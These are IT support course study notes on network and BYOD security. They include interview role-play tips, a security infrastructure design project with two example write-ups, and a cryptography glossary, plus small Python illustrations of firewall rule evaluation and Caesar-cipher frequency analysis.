7. Restrict data access: IT departments should protect company data by limiting access to only those
employees who need access to perform their jobs.  
8. Educate staff about data security: Organizations can provide training manuals and seminars to
inform employees about network security risks and to instruct on how to secure their BYODs.
9. Back up device data: IT departments need to create backup policies for all important data. This
should include a schedule for frequency of backups, storage space for the back-up copies, how
long back-ups should be stored, and disaster recovery plans. 
10. Data leakage prevention (DLP): IT departments can implement DLP software solutions to help
manage and protect confidential information. 

Key takeaways

Organizations are taking advantage of the cost savings created by adopting “bring your own device”
(BYOD) policies for employees. However, permitting employees to connect personal mobile devices to
company networks introduces multiple security threats. There are a variety of security measures that IT
departments can implement to protect organizations’ information systems:

• Develop BYOD policies
• Enforce BYOD policies with MDM software
• Distribute MDM settings to multiple OSes through EMM systems
• Require multi-factor authentication (MFA)
• Create acceptable use policies for company data and resources
• Require employees to sign NDAs
• Limit who can access data
• Train employees on data security
• Back up data regularly

Resources for more information

• BYOD (bring your own device) - Additional information on how BYOD works, why it is important,
  level of access options, risks, challenges, policy comparisons, best practices, and how to implement a
  BYOD policy.
• BYOD policy: An in-depth guide from an IT leader - Compares BYOD advantages and disadvantages,
  what should be included in a BYOD policy, tips for reducing security risks, and more.
• What is MDM? - Introduces the purpose of MDM software, how it works, advantages of using MDM,
  use cases, and more.
• Enterprise Mobility Management (EMM) - Outlines the features, services, and benefits of EMM
  systems.

TIPS FOR INTERVIEW

The typical interview for an IT support candidate is going to be some form of role-playing. Are you able to communicate with a wide range of individuals? Are you able to communicate very difficult concepts to people who may not have such a strong technical background? Often, they will use past examples of real-life situations and role-play those with you in the interview. They want to see how you handle that, especially if they throw in someone who has had a really bad day and comes to you with the problem that was the last straw that broke the camel's back. They want to see if your approach is just a brute-force method to solve the problem, or if you're taking a creative, efficient approach to solving something, doing this with a positive attitude and leaving the user feeling empowered to solve these problems for themselves in the future. It can help to practice in person, practice over the phone, and practice over video, because in today's world you're supporting people on all three mediums. Each one will have a little tweak of how soft skills can play a big role in the relationship you have with the user.

TIPS FOR INTERVIEW

It's very important to do prior research on the role and company that you're interviewing for. You want to make sure that you have some questions prepared in advance for your interview on those two things. So in terms of the role, feel free to ask your interviewer their perspective on the day-to-day of what you'll be doing. In terms of asking questions about the company, you want to show that you have some of the same values and mission that the company has by asking questions along those lines. Outside of soft skills, some of the qualities that a hiring manager or interviewer may be looking for are going to be: are you showing that you have a methodical approach to the way that you're approaching the problem? Another quality that hiring managers or interviewers may be looking for is the ability to problem solve. IT professionals are not going to know everything about IT, but you do want to show that you are able to think on the spot, challenge yourself and still walk through a scenario even if it is a bit unfamiliar to you. In order to prepare for the troubleshooting and problem solving aspect of the interview, a good way to do that is to practice via mock interviews, so that you do get in the art and the exercise of being able to walk through and talk out your thought process. Find yourself a person that can run through some questions with you, whether that be a roommate or a relative. Identify some questions that they can ask you, real-life scenario questions that you've either encountered or haven't encountered before, and have them ask those questions. Practice walking through something that you're not as familiar with, and practice your communication skills in delivering that, even if you're not sure of the answer.

INTERVIEW ROLE TIPS

Hi, I'm Rob.

I'm Candice.

Congrats on making it through this course. Now that you've made it this far, we're here to give you a sneak peek into what an interview on the technical subjects covered by this course might look like. We hope this will help you have a better idea of what to expect in your next interview. Just keep learning and keep practicing.

In this scenario, let's say I'm a small business owner and I only have about 15 employees, but I expect it to grow over the next couple of years. I had a friend who was hacked and lost a lot of sensitive data, and I want to make sure I understand how to prevent that from happening to my business. Walk me through some best practices for network security.

You want to list out all the services that you'll need on a network, and then you also want to disable all the services that you won't use. This principle can be applied to all aspects of your infrastructure. For example, we have a firewall; we can configure it to allow all the services that you want and then disable all the services that you don't want, so it will block all that traffic.

Interesting. Why do we use that philosophy, or what is that philosophy called?

We use this because it allows you to not have vulnerabilities slip through, and this is also called whitelisting, instead of blacklisting.

Why would we disable things that I wouldn't be using?

The reason why we want to restrict these services that you won't use is because it will allow you to know what's coming in, because you know what you have allowed, instead of having some services blocked, because that will allow more vulnerabilities to come through.

Good. What are some other things that I might need?

Another thing you might need is a network monitoring solution. This will be helpful because it'll allow you to identify traffic that's coming through your network.

One other thing that comes up: I worked with a lot of contractors, and a lot of times they'll bring their own machines onto our network. Is there anything I need to be concerned about with them connecting to my network with their own machines?

Yes. You want to restrict those machines just because you don't control them and you don't know what's on them. I would say we could set up a different segment on the network, or we can have a different wireless network.

Good. Yeah, so wireless is actually really important and I do want to have a wireless network. How do we actually secure the wireless network? What would be some things that we can implement there?

We can use strong encryption like WPA2.

What is WPA2? Why is that better than some of the other encryption methods?

WPA2 improves the security of a network because it has a stronger encryption method called AES.

The last thing I wanted to ask you about was phishing attacks. I've heard that this is a common way for hackers to get passwords and things like that. I want to make sure that my employees don't get hacked by a phishing attack. How do we prevent that?

You want to have your employees use strong passwords. You can set the password requirements to have symbols, numbers, uppercase and lowercase letters. You want to have your employees change their passwords a few times throughout the year, also have them use two-factor authentication, and you can just educate your employees just to let them know not to open up suspicious emails or emails from senders that they don't know.

Can you explain what two-factor is real quick?

Yes. Two-factor authentication is two variations of authentication methods, and the authentication methods can be either a password, fingerprint, something that's related to biometrics, or it can also be a security chip.

Great. I didn't know that. Thanks very much.

Thanks.

In this scenario, we've seen how important it is to clearly explain yourself and to articulate IT concepts and the advantages of the technologies chosen. In a technical interview, there are going to be a lot of technical concepts that need to be explained. It's important to keep calm and describe them without panicking. This was our last role-play in the last course of the program. Congratulations on making it all the way here. We hope these role-plays may have helped you get a better idea of what your next interview might look like. You may want to review all the tips we provided way back in the first course so you're prepared and you nail your IT support interview. Good luck.

Invitation to Sign Up for Big Interview


Since preparation is key to nailing interviews and landing a new job, we’ve worked with Big
Interview, an online interview preparation platform, to create interactive interview tools
specifically for IT Support Certificate learners like you. 

We’re excited to be able to offer you 12 months of free access (a $79/month value) as part of
the Google IT Support Certificate! You’ve earned it. On Big Interview you can:

• Practice answering interview questions in a recorded environment that allows you to
  get feedback and hone your interviewing skills
• Prepare a resume using their resume-building tool

Follow the steps below to sign up for your Big Interview account and start practicing!

1. Go to https://googlecerts.biginterview.com/.
2. Click Register.
3. Register with your name, email address, and password.
4. Log in.
5. Go to the Learn page.
6. Click Google Certificates Practice Sets.
7. Choose IT Support to begin practicing!

Question 1
Overview: Now that you’re super knowledgeable about security, let's put your newfound know-how to the
test. You may find yourself in a tech role someday, where you need to design and influence a culture of
security within an organization. This project is your opportunity to practice these important skillsets.

Assignment: In this project, you’ll create a security infrastructure design document for a fictional
organization. The security services and tools you describe in the document must be able to meet the needs
of the organization. Your work will be evaluated according to how well you met the organization’s
requirements.

About the organization: This fictional organization has a small, but growing, employee base, with 50
employees in one small office. The company is an online retailer of the world's finest artisanal, hand-
crafted widgets. They've hired you on as a security consultant to help bring their operations into better
shape.

Organization requirements: As the security consultant, the company needs you to add security measures
to the following systems:

• An external website permitting users to browse and purchase widgets
• An internal intranet website for employees to use
• Secure remote access for engineering employees
• Reasonable, basic firewall rules
• Wireless coverage in the office
• Reasonably secure configurations for laptops

Since this is a retail company that will be handling customer payment data, the organization would like to
be extra cautious about privacy. They don't want customer information falling into the hands of an
attacker due to malware infections or lost devices.

Engineers will require access to internal websites, along with remote, command line access to their
workstations.

Grading: This is a required assignment for the module.

What you'll do: You’ll create a security infrastructure design document for a fictional organization. Your
plan needs to meet the organization's requirements and the following elements should be incorporated
into your plan:

• Authentication system
• External website security
• Internal website security
• Remote access solution
• Firewall and basic rules recommendations
• Wireless security
• VLAN configuration recommendations
• Laptop security configuration
• Application policy recommendations
• Security and privacy policy recommendations
• Intrusion detection or prevention for systems containing customer data

This document describes how the functional and nonfunctional requirements recorded in the
Requirements Document, together with the preliminary user-oriented functional design, are
reflected in the design specifications. It also describes the design goals that follow from the
requirements by providing a high-level overview of the system architecture, and describes the
data design associated with the system as well as the human-machine scenarios in terms of
interaction and operation. The high-level system design is further decomposed into low-level
detailed design specifications, including hardware, software, data storage and retrieval
mechanisms, and external interfaces.

Purpose of the Security Infrastructure Design Document

The Security Infrastructure Design Document records and tracks the information required to
define the architecture and system design, and so gives guidance on the security architecture
of the IT environment that is going to be established.
2. General Overview and Design Approach

2.1 General Overview

The client requires an IT infrastructure to perform business activities that involve
e-commerce applications and internal VPN access for customers as well as employees, with a
high priority on the security and privacy of customer information and of the client's own
information.

2.2 Assumptions/Constraints/Risks

Assumptions

It is assumed that the number of employees increases by 5% every year, with a corresponding
increase in network bandwidth usage and in the number of devices connected to the enterprise
network infrastructure.

Constraints

The following are the key considerations associated with the security of the infrastructure:

 · Authentication system
 · External website security
 · Internal website security
 · Remote access solution
 · Firewall and basic rules recommendations
 · Wireless security
 · VLAN configuration recommendations
 · Laptop security configuration
 · Application policy recommendations
 · Security and privacy policy recommendations
 · Intrusion detection or prevention for systems containing customer data

Risks

Since the infrastructure is meant to carry out e-commerce transactions that may involve
third-party merchant authorizations and financial matters, a strict security mechanism needs
to be enforced so that no issue arises in customer transactions, as this would affect the
reputation of the organization.

Additionally, there should be a backup mechanism that takes data backups at regular intervals
to deal with unwanted situations such as system failures and attacks by intruders.

2.3 Alignment with Federal Enterprise Architecture

The proposed architecture strictly complies with the Federal Enterprise Architecture. All the
protocols and hardware interfaces used comply with the industry standards as specified, so as
to ensure compatibility of the networks as well as security in compliance with the CMS
Enterprise Architecture (EA).
3. Design Considerations

3.1 Goals

The following are the desirable outcomes of the security infrastructure proposed to be
implemented in the organization:

 · An external website permitting users to browse and purchase widgets securely
 · An internal intranet website, like that of a VPN, for employees to use
 · Secure remote access for engineering employees
 · Reasonable, basic firewall rules
 · Wireless coverage in the office
 · Reasonably secure configurations for laptops
 · Privacy of the user data

3.2 Architectural Strategies

1. External website used by customers to make purchases

In order to provide secure e-commerce transactions, the primary security goals are:

 · Protecting the confidentiality of the data
 · Making sure that unauthorized persons or systems cannot access the information of users
 · Making sure that the information accessed is genuine
 · Making the data accessible and usable
 · Logging the transactions for further reference and support activity
 · Verifying the authenticity of a person before they perform a transaction
2. Intranet website accessed by employees

Since the data is accessed only by company employees, it should be available only at the
company's level of access, keeping it private from the other information maintained on the
infrastructure. The considerations in this case are:

 · Making sure that access stays within the intranet by implementing a firewall mechanism
 · Specifying the authentication mechanism employees use to access the website
 · Supervising the activities and user management on the website through an administrator

3. Secure remote access for engineering employees

Remote access control objectives can be implemented safely based on the following security
considerations:

Device type: What device types require remote access?

Role: What remote access is appropriate for that role given the device used?

Location: Is access from a public location, another company site, internal wireless, etc.?

Process and data: What processes and data are accessible given the first three access
characteristics?

Authentication method: Does the need for strong authentication increase based on the device
used, where it is used, and what it is allowed to access?

4. Basic firewall rules to be implemented

Block by default: block all incoming and outgoing connections

Allow specific traffic: only allow specified IP addresses

Allow inbound: only allow intranet users

5. Wireless coverage in the office

Can be provided with an 802.11 WLAN adapter/router with a PSK (pre-shared key)
configuration, or with login-based limited access to the company WiFi for employees.

Security considerations: should be password protected and metered

6. VLAN configuration

VLAN network segmentation creates security zones that enable flexible and strong control of
what a remote user can access, separating incoming traffic from internal resources. Using
dynamic VLAN assignments and access control lists, we can control user access based on
conditions.
7. Laptop security configuration

One of the most vulnerable parts of the infrastructure is the laptop computers that employees
use. These devices can be responsible for bringing in viruses or malware, or for causing the
organization to lose sensitive data. This can be addressed using techniques such as:

 · Encrypting the disks on the laptops
 · Ensuring antimalware/antivirus software is updated at regular intervals
 · Whitelisting the devices on the network
 · Running a product such as System Center Configuration Manager, LANDesk, Altiris, or some
other systems management platform

8. Application policy recommendations

 · Integrate secure coding principles in all software components of the infrastructure.
 · Perform automated application security testing as part of the overall application testing
process.
 · Development and testing environments should redact all sensitive data or use de-identified
data.
 · Comply with industry-standard data policies and protocols.

9. Security and privacy policy recommendations

Explain how the organization collects and uses personal information:

 · Cookie policy: cookies are used to store user preferences or shopping cart contents. Clearly
explain your cookie practice.
 · How the organization will share customer information: customers need to know that their
data will only be used to complete the transaction and that any further use of that data
(including selling or distributing it) requires their consent.
 · Contact information: make it easy for your customers to contact you or file a complaint.

Display the privacy policy: make sure new customers or users have easy access to your policy;
this is mandatory.

Publish email opt-out policies: include opt-out options in your email marketing.

Get a seal of approval: third-party validation of your online privacy and security policy can
enhance your credibility and the trust placed in your security.

10. Intrusion detection or prevention for systems containing customer data

As the demand for e-commerce on the Internet grows, so will the potential for e-commerce
sites to be attacked. Implementing security methodologies for an e-commerce environment is
not a simple thing; it should consider the various threats and anomalies that can lead to an
attack. Detection can be by signature or by anomaly, informed by penetration testing and
reverse engineering, and can be achieved with a third-party IDS readily available in the
market.
Summary

Thus we conclude the report: the security infrastructure of the organization has been assessed
and recommendations were made as required for the proposed environment as specified.

Key assets being protected: customer information, company-related information

Key threats to protect against: intrusion into the website, data loss

Key activities to protect: customer purchase of artifacts, payment transactions, employee data

Relative ranking of fundamental security goals:

This is an important exercise for every organization as part of the risk mitigation planning
process. For this project, the ranking came out like this:

Confidentiality: high
Integrity: high
Availability: medium
Auditability: medium
Nonrepudiation: N/A

Final Project - Sample Submission


Authentication
Authentication will be handled centrally by an LDAP server and will incorporate One-Time
Password generators as a 2nd factor for authentication.

External Website
The customer-facing website will be served via HTTPS, since it will be serving an e-commerce
site permitting visitors to browse and purchase products, as well as create and log into
accounts. This website would be publicly accessible.

Internal Website
The internal employee website will also be served over HTTPS, as it will require
authentication for employees to access. It will also only be accessible from the internal
company network and only with an authenticated account.

Remote Access
Since engineers require remote access to internal websites, as well as remote command line
access to workstations, a network-level VPN solution will be needed, like OpenVPN. To make
internal website access easier, a reverse proxy is recommended, in addition to VPN. Both of
these would rely on the LDAP server that was previously mentioned for authentication and
authorization.

Firewall
A network-based firewall appliance would be required. It would include rules to permit traffic
for various services, starting with an implicit deny rule, then selectively opening ports. Rules
will also be needed to allow public access to the external website, and to permit traffic to the
reverse proxy server and the VPN server.
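The "implicit deny, then selectively open ports" rule order described here (and the "block by default, allow specific traffic" rules in the design document above) can be modelled as a first-match rule table whose fall-through is a drop. The following is an added example, not part of the sample submission; the addresses, port numbers and rule names are constructed for illustration.

```python
"""Implicit-deny firewall rule evaluation (added illustration).

All addresses, ports and rule names below are constructed for the example;
they are not from the course's sample submission.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str    # "tcp" or "udp"
    dport: int


@dataclass(frozen=True)
class Rule:
    name: str
    action: str                   # "allow" or "deny"
    src: str = "0.0.0.0/0"
    dst: str = "0.0.0.0/0"
    proto: Optional[str] = None   # None matches any protocol
    dport: Optional[int] = None   # None matches any destination port

    def matches(self, pkt: Packet) -> bool:
        return (
            ip_address(pkt.src) in ip_network(self.src)
            and ip_address(pkt.dst) in ip_network(self.dst)
            and (self.proto is None or self.proto == pkt.proto)
            and (self.dport is None or self.dport == pkt.dport)
        )


# Constructed addressing plan (assumption for the example).
INTERNET = "0.0.0.0/0"
OFFICE_LAN = "10.0.0.0/16"
WEB_SERVER = "203.0.113.10/32"      # public e-commerce site
REVERSE_PROXY = "203.0.113.11/32"   # fronts the internal website for remote engineers
VPN_SERVER = "203.0.113.12/32"      # OpenVPN endpoint
INTRANET_WEB = "10.0.10.20/32"      # internal employee website
DB_SERVER = "10.0.20.5/32"          # holds customer data; never exposed directly

# Rules are evaluated first-match; anything not matched falls through to deny.
RULES: List[Rule] = [
    Rule("public web https", "allow", INTERNET, WEB_SERVER, "tcp", 443),
    Rule("public web http", "allow", INTERNET, WEB_SERVER, "tcp", 80),
    Rule("reverse proxy https", "allow", INTERNET, REVERSE_PROXY, "tcp", 443),
    Rule("openvpn", "allow", INTERNET, VPN_SERVER, "udp", 1194),
    Rule("office to intranet site", "allow", OFFICE_LAN, INTRANET_WEB, "tcp", 443),
    Rule("web app to database", "allow", WEB_SERVER, DB_SERVER, "tcp", 5432),
]


def evaluate(pkt: Packet, rules: List[Rule] = RULES) -> str:
    """Return "allow" or "deny" for pkt: first matching rule wins, else implicit deny."""
    for rule in rules:
        if rule.matches(pkt):
            return rule.action
    return "deny"


def explain(pkt: Packet, rules: List[Rule] = RULES) -> str:
    """Like evaluate(), but names the rule that decided (useful when auditing a ruleset)."""
    for rule in rules:
        if rule.matches(pkt):
            return f"{rule.action} ({rule.name})"
    return "deny (implicit default)"


if __name__ == "__main__":
    for pkt in (Packet("198.51.100.7", "203.0.113.10", "tcp", 443),
                Packet("198.51.100.7", "10.0.20.5", "tcp", 5432),
                Packet("198.51.100.7", "203.0.113.10", "tcp", 22)):
        print(pkt, "->", explain(pkt))
```

The point of the model is the last line of `evaluate()`: a packet that no rule names is dropped, so a new service stays unreachable until someone deliberately adds a rule for it. Keeping the database server off every Internet-facing rule is what makes "only the web application can reach customer data" an enforced property rather than a hope.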

Wireless
For wireless security, 802.1X with EAP-TLS should be used. This would require the use of
client certificates, which can also be used to authenticate other services, like VPN, reverse
proxy, and internal website authentication. 802.1X is more secure and more easily managed
as the company grows, making it a better choice than WPA2.

VLANs
Incorporating VLANs into the network structure is recommended as a form of network
segmentation; it will make controlling access to various services easier to manage. VLANs can
be created for broad roles or functions for devices and services. An engineering VLAN can be
used to place all engineering workstations and engineering services on. An Infrastructure
VLAN can be used for all infrastructure devices, like wireless APs, network devices, and critical
servers like authentication. A Sales VLAN can be used for non-engineering machines, and a
Guest VLAN would be useful for other devices that don't fit the other VLAN assignments.

Laptop Security
As the company handles payment information and user data, privacy is a big concern.
Laptops should have full disk encryption (FDE) as a requirement, to protect against
unauthorized data access if a device is lost or stolen. Antivirus software is also strongly
advised to avoid infections from common malware. To protect against more uncommon
attacks and unknown threats, binary whitelisting software is recommended, in addition to
antivirus software.

Application Policy
To further enhance the security of client machines, an application policy should be in place to
restrict the installation of third-party software to only applications that are related to work
functions. Specifically, risky and legally questionable application categories should be
explicitly banned. This would include things like pirated software, license key generators, and
cracked software.

In addition to policies that restrict some forms of software, a policy should also be included to
require the timely installation of software patches. “Timely” in this case will be defined as 30
days from the wide availability of the patch.

User Data Privacy Policy


As the company takes user privacy very seriously, some strong policies around accessing user
data are a critical requirement. User data must only be accessed for specific work purposes,
related to a particular task or project. Requests must be made for specific pieces of data,
rather than overly broad, exploratory requests. Requests must be reviewed and approved
before access is granted. Only after review and approval will an individual be granted access
to the specific user data requested. Access requests to user data should also have an end
date.

In addition to accessing user data, policies regarding the handling and storage of user data
are also important to have defined. These will help prevent user data from being lost and
falling into the wrong hands. User data should not be permitted on portable storage devices,
like USB keys or external hard drives. If an exception is necessary, an encrypted portable hard
drive should be used to transport user data. User data at rest should always be contained on
encrypted media to protect it from unauthorized access.

Security Policy
To ensure that strong and secure passwords are used, the password policy below should be
enforced:
 · Password must have a minimum length of 8 characters
 · Password must include a minimum of one special character or punctuation
 · Password must be changed once every 12 months
In addition to these password requirements, a mandatory security training must be
completed by every employee once every year. This should cover common security-related
scenarios, like how to avoid falling victim to phishing attacks, good practices for keeping your
laptop safe, and new threats that have emerged since the last time the course was taken.

Intrusion Detection or Prevention Systems


A Network Intrusion Detection System is recommended to watch network activity for signs of
an attack or malware infection. This would allow for good monitoring capabilities without
inconveniencing users of the network. A Network Intrusion Prevention System (NIPS) is
recommended for the network where the servers containing user data are located; it contains
much more valuable data, which is more likely to be targeted in an attack. In addition to
Network Intrusion Prevention, Host-based Intrusion Detection (HIDS) software is also
recommended to be installed on these servers to enhance monitoring of these important
systems.

Supplemental Reading for SHA1 Attacks


During the 2000s, a bunch of theoretical attacks against
SHA1 were formulated and some partial collisions were
demonstrated. In early 2017, the first full collision of SHA1
was published.

Supplemental Reading for the X.509 Standard


For more information about this topic from this video lecture, check out the following
link. The X.509 standard is what defines the format of digital certificates.

Supplemental Reading for PGP


PGP was developed by Phil Zimmermann in 1991 and was freely available for anyone to
use.

Supplemental Reading for Securing Network Traffic

The combination of L2TP and IPsec is referred to as L2TP/IPsec and was officially
standardized in IETF RFC 3193.

An example of this is OpenVPN, which uses the OpenSSL library to handle key exchange
and encryption of data along with control channels.

Supplemental Reading for TPM Attacks


There’s been one report of a physical attack on a TPM which allowed a security
researcher to view and access the entire contents of a TPM.

Module 2 Glossary
New terms and their definitions: Course 5 Week 2
Advanced Encryption Standard (AES): The first and only public cipher that's approved for
use with top secret information by the United States National Security Agency

Asymmetric encryption: Systems where different keys are used to encrypt and decrypt

Authentication: A crucial application for cryptographic hash functions


Block ciphers: The cipher takes data in, places that into a bucket or block of data that's a
fixed size, then encodes that entire block as one unit

CA (Certificate authority): It's the entity that's responsible for storing, issuing, and signing
certificates. It's a crucial component of the PKI system

Caesar cipher: A substitution alphabet, where you replace characters in the alphabet with
others usually by shifting or rotating the alphabet, a set of numbers or characters

CBC-MAC (Cipher block chaining message authentication codes): A mechanism for building
MACs using block ciphers

Central repository: It is needed to securely store and index keys and a certificate
management system of some sort makes managing access to storage certificates and
issuance of certificates easier

Certificate fingerprints: These are just hash digests of the whole certificate, and aren't
actually fields in the certificate itself, but are computed by clients when validating or
inspecting certificates

Certificate Revocation List (CRL): A means to distribute a list of certificates that are no
longer valid

Certificate Signature Algorithm: This field indicates what public key algorithm is used for
the public key and what hashing algorithm is used to sign the certificate

Certificate-based authentication: It is the most secure option, but it requires more support
and management overhead since every client must have a certificate

Certificate Signature Value: The digital signature data itself

CMACs (Cipher-based Message Authentication Codes): The process is similar to HMAC, but
instead of using a hashing function to produce a digest, a symmetric cipher with a shared
key is used to encrypt the message and the resulting output is used as the MAC

Code signing certificates: It is used for signing executable programs and allows users of these
signed applications to verify the signatures and ensure that the application was not tampered
with

Cryptanalysis: Looking for hidden messages or trying to decipher coded message

Cryptography: The overarching discipline that covers the practice of coding and hiding
messages from third parties

Cryptology: The study of cryptography


Cryptosystem: A collection of algorithms for key generation and encryption and decryption
operations that comprise a cryptographic service 

Cryptographic hashing: It is distinctly different from encryption because cryptographic hash
functions should be one directional

Data binding and sealing: It involves using the secret key to derive a unique key that's then
used for encryption of data

Decryption: The reverse process from encryption; taking the garbled output and
transforming it back into the readable plain text

DES (Data Encryption Standard): One of the earliest encryption standards 

Deterministic: It means that the same input value should always return the same hash value

DH (Diffie-Hellman): A popular key exchange algorithm, named for its co-inventors

DSA (Digital Signature Algorithm): It is another example of an asymmetric encryption
system, though it's used for signing and verifying data

ECDH & ECDSA: Elliptic curve variants of Diffie-Hellman and DSA, respectively

Elliptic curve cryptography (ECC): A public key encryption system that uses the algebraic
structure of elliptic curves over finite fields to generate secure keys

Encapsulating security payload: It's a part of the IPsec suite of protocols, which
encapsulates IP packets, providing confidentiality, integrity, and authentication of the
packets

Encryption: The act of taking a message (plaintext), and applying an operation to it (cipher),
so that you receive a garbled, unreadable message as the output (ciphertext)

Encryption algorithm: The underlying logic or process that's used to convert the plaintext
into ciphertext

End-entity (leaf certificate): A certificate that has no authority as a CA

Entropy pool: A source of random data to help seed random number generators

FIPS (Federal Information Processing Standard): The DES that was adopted as a federal
standard for encrypting and securing government data

Forward secrecy: This is a property of a cryptographic system so that even in the event that
the private key is compromised, the session keys are still safe

Frequency analysis: The practice of studying the frequency with which letters appear in
ciphertext

Full disk encryption (FDE): It is the practice of encrypting the entire drive in the system

Hash collisions: Two different inputs mapping to the same output

Hashing (Hash function): A type of function or operation that takes in an arbitrary data input
and maps it to an output of a fixed size, called a hash or a digest

HMAC (Keyed-Hash Message Authentication Codes): It uses a cryptographic hash function
along with a secret key to generate a MAC

HTTPS: Hypertext Transfer Protocol Secure is a secure version of HTTP that ensures the
communication your web browser has with the website is secured through encryption

Intermediary (subordinate) CA: It means that the entity that this certificate was issued to
can now sign other certificates

IPsec (Internet Protocol security): A VPN protocol that was designed in conjunction with
IPv6

Issuer Name: This field contains information about the authority that signed the certificate

Kerckhoff's principle: A principle that states that a cryptosystem, or a collection of
algorithms for key generation and encryption and decryption operations that comprise a
cryptographic service, should remain secure even if everything about the system is known
except for the key

Key: A crucial component of a cipher, which introduces something unique into your cipher

Key length: It defines the maximum potential strength of the system

Key signing parties: Organized by people who are interested in establishing a web of trust,
and participants perform the same verification and signing

Key size: It is the total number of bits or data that comprises the encryption key

L2TP (Layer 2 Tunneling Protocol): It is typically used to support VPNs

MACs (Message Authentication Codes): A bit of information that allows authentication of a
received message, ensuring that the message came from the alleged sender and not a third
party masquerading as them

MD5: A popular and widely used hash function designed in the early 1990s as a
cryptographic hashing function

MIC (Message Integrity Check): It is essentially a hash digest of the message in question

NIST: National Institute of Standards and Technology 

Password salt: Additional randomized data that's added into the hashing function to
generate the hash that's unique to the password and salt combination

PGP (Pretty Good Privacy) encryption: An encryption application that allows
authentication of data along with privacy from third parties, relying upon asymmetric
encryption to achieve this

PKI system: A system that defines the creation, storage and distribution of digital certificates

Pseudo-random: Something that isn't truly random

Public key authentication: A key pair is generated by the user who wants to authenticate

Public key signatures: Digital signature generated by composing the message and
combining it with the private key

RA (Registration Authority): It is responsible for verifying the identities of any entities
requesting certificates to be signed and stored with the CA

Rainbow table attacks: To trade computational power for disk space by pre-computing the
hashes and storing them in a table

Rainbow tables: A pre-computed table of all possible password values and their
corresponding hashes

Random numbers: A very important concept in encryption because it avoids some kind of
pattern that an adversary can discover through close observation and analysis of encrypted
messages over time

RC4 (Rivest Cipher 4): A symmetric stream cipher that gained widespread adoption because
of its simplicity and speed

Remote attestation: The idea of a system authenticating its software and hardware
configuration to a remote system

Root certificate authority: They are self signed because they are the start of the chain of
trust, so there's no higher authority that can sign on their behalf

RSA: One of the first practical asymmetric cryptography systems to be developed, named for
the initials of the three co-inventors: Ron Rivest, Adi Shamir and Leonard Adleman

Secure channel: It is provided by IPsec, which provides confidentiality, integrity, and
authentication of data being passed

Secure element: It's a tamper resistant chip often embedded in the microprocessor or
integrated into the mainboard of a mobile device

Secure Shell (SSH): A secure network protocol that uses encryption to allow access to a
network service over unsecured networks

Security through obscurity: The principle that if no one knows what algorithm is being used
or general security practices, then one is safe from attackers

Self-signed certificate: This certificate has been signed by the same entity that issued the
certificate

Serial number: A unique identifier for their certificate assigned by the CA which allows the CA
to manage and identify individual certificates

Session key: The shared symmetric encryption key using TLS sessions to encrypt data being
sent back and forth

SHA1: It is part of the secure hash algorithm suite of functions, designed by the NSA and
published in 1995

Shannon's maxim: It states that the system should remain secure, even if your adversary
knows exactly what kind of encryption systems you're employing, as long as your keys remain
secure

SSL 3.0: The latest revision of SSL that was deprecated in 2015

SSL/TLS Client Certificate: Certificates that are bound to clients and are used to
authenticate the client to the server, allowing access control to a SSL/TLS service

SSL/TLS Server Certificate: A certificate that a web server presents to a client as part of the
initial secure setup of an SSL, TLS connection

Steganography: The practice of hiding information from observers, but not encoding it

Stream ciphers: It takes a stream of input and encrypts the stream one character or one digit
at a time, outputting one encrypted character or digit at a time

Subject: This field contains identifying information about the entity the certificate was issued
to

Subject Public Key Info: These two subfields define the algorithm of the public key along
with the public key itself

Substitution cipher: An encryption mechanism that replaces parts of your plaintext with
ciphertext

Symmetric key algorithm: Encryption algorithms that use the same key to encrypt and
decrypt messages

TLS 1.2: The current recommended revision of SSL

TLS 1.2 with AES GCM: A specific mode of operation for the AES block cipher that
essentially turns it into a stream cipher

TLS Handshake: A mechanism to initially establish a channel for an application to
communicate with a service

TPM (Trusted Platform Module): This is a hardware device that's typically integrated into
the hardware of a computer, that's a dedicated crypto processor

Transport mode: One of the two modes of operations supported by IPsec. When used, only
the payload of the IP packet is encrypted, leaving the IP headers untouched

Trusted execution environment (TEE): It provides a full-blown isolated execution
environment that runs alongside the main OS

Tunnel: It is provided by L2TP, which permits the passing of unmodified packets from one
network to another

Tunnel mode: One of the two modes of operations supported by IPsec. When used, the entire
IP packet, header, payload, and all, is encrypted and encapsulated inside a new IP packet
with new headers

Username and password authentication: Can be used in conjunction with certificate
authentication, providing additional layers of security

Validity: This field contains two subfields, Not Before and Not After, which define the dates
when the certificate is valid for

Version: What version of the X.509 standard certificate adheres to

VPN (Virtual Private Network): A secure method of connecting a device to a private
network over the internet

Web of trust: It is where individuals instead of certificate authorities sign other individuals'
public keys

X.509 standard: It is what defines the format of digital certificates, as well as a certificate
revocation list or CRL
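The glossary's entries for substitution ciphers, the Caesar cipher, frequency analysis and Kerckhoff's principle fit together in one small experiment: encrypt English text with a Caesar shift, then recover the shift from letter frequencies alone. This is an added example written for this page, not course material; the sample sentence and the function names are constructed for it.

```python
"""Caesar cipher and frequency analysis (added illustration of the glossary terms).

The plaintext below is constructed for the example; nothing here is from the course.
"""
import string
from collections import Counter

ALPHABET = string.ascii_lowercase

# Constructed sample text, deliberately rich in the letter 'e'.
PLAINTEXT = ("Meet me at the east entrance of the engineering building before the "
             "evening shift ends. Everyone else leaves early.")


def caesar(text: str, shift: int) -> str:
    """Rotate every letter by `shift` positions; case and non-letters are preserved.

    A negative shift decrypts. This is a substitution cipher: each plaintext
    letter is replaced by the letter `shift` places further along the alphabet.
    """
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def letter_frequencies(text: str) -> Counter:
    """Count how often each letter appears, ignoring case and non-letters."""
    return Counter(ch for ch in text.lower() if ch in ALPHABET)


def guess_shift(ciphertext: str) -> int:
    """Frequency analysis: assume the most common ciphertext letter stands for 'e'.

    'e' is the most frequent letter in English, so the distance between it and
    the most frequent ciphertext letter is the likely key.
    """
    most_common_letter, _ = letter_frequencies(ciphertext).most_common(1)[0]
    return (ord(most_common_letter) - ord("e")) % 26


def recover_plaintext(ciphertext: str) -> str:
    """Undo a Caesar shift without being told the key."""
    return caesar(ciphertext, -guess_shift(ciphertext))


if __name__ == "__main__":
    ct = caesar(PLAINTEXT, 7)
    print("ciphertext:", ct)
    print("guessed shift:", guess_shift(ct))
    print("recovered:", recover_plaintext(ct))
```

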